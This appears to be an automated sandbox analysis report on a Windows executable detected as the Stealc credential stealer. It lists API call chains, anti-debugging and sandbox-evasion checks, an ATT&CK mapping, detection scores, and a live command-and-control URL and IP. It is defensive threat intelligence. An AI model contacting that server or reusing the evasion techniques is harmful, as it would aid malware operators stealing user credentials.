              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_009C18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009C3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_009CE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009C1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009C1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009BDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009BDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_009C2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009BDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009BDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_009C23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_009CCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009C4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_009C4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_009CD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_009CDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_009B16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_009B16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_009D1BF0
              Source: file.exe, file.exe, 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1351848119.00000000010F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
              Source: file.exe, 00000000.00000002.1351848119.00000000010AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1351848119.0000000001126000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25958
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25811
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25965
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25854
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25830
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B4A60 VirtualProtect 00000000,00000004,00000100,?0_2_009B4A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009D6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D6390 mov eax, dword ptr fs:[00000030h]0_2_009D6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D2AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_009D2AD0
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7404, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_009D46A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_009D4610
              Source: file.exe, file.exe, 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_009D2D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D1B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_009D1B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_009D2A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_009D2C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.1351848119.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1295699560.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7404, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.1351848119.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1295699560.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7404, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts12
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe42%ReversingLabsWin32.Trojan.Generic
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.php?=100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpS=100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.php_=100%Avira URL Cloudmalware
              http://185.215.113.206qM0%Avira URL Cloudsafe
              http://185.215.113.206/c4becf79229cb002.phpK=100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/false
                		high
                http://185.215.113.206/c4becf79229cb002.phpfalse
                  		high
                  185.215.113.206/c4becf79229cb002.phpfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/qfile.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.php?=file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.215.113.206/c4becf79229cb002.php_=file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.215.113.206/c4becf79229cb002.phpS=file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.215.113.206/Bfile.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.206file.exe, 00000000.00000002.1351848119.00000000010AE000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.206/c4becf79229cb002.phpK=file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://185.215.113.206/c4becf79229cb002.phpsfile.exe, 00000000.00000002.1351848119.00000000010AE000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://185.215.113.206qMfile.exe, 00000000.00000002.1351848119.00000000010AE000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.206
                              		unknownPortugal
                              		206894WHOLESALECONNECTIONSNLtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1561486
                              Start date and time:2024-11-23 14:46:09 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 13s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 79%
                              • Number of executed functions: 18
                              • Number of non-executed functions: 126
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.206file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousAmadey, CryptbotBrowse
                              • 185.215.113.43
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 185.215.113.16

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.947067089957022
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'787'392 bytes
